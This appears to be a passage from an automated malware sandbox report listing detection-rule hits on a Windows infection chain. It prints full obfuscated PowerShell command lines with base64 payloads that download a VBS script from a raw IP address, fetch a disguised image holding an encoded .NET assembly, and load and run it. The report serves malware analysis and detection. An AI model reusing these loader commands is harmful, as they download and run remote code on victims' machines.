ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" , ProcessId: 7644, ProcessName: wscript.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAn
                        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgI
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7436, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" , ProcessId: 7644, ProcessName: wscript.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1wf2prhw\1wf2prhw.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1wf2prhw\1wf2prhw.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7436, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1wf2prhw\1wf2prhw.cmdline", ProcessId: 7572, ProcessName: csc.exe
                        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7436, TargetFilename: C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS
                        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7436, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" , ProcessId: 7644, ProcessName: wscript.exe
                        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7436, TargetFilename: C:\Users\user\AppData\Local\Temp\1wf2prhw\1wf2prhw.cmdline
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))", CommandLine: POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICA

                        Data Obfuscation

                        barindex
                        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1wf2prhw\1wf2prhw.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1wf2prhw\1wf2prhw.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZ